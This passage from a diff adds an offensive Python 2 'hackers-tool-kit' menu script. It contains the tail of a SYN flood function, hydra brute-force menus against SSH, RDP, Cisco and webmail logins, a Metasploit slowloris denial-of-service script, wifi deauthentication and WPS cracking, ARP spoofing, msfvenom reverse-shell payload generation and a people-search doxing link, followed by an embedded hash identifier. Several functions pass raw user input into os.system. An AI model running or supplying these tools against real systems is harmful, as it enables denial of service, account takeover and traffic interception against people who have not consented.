sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if 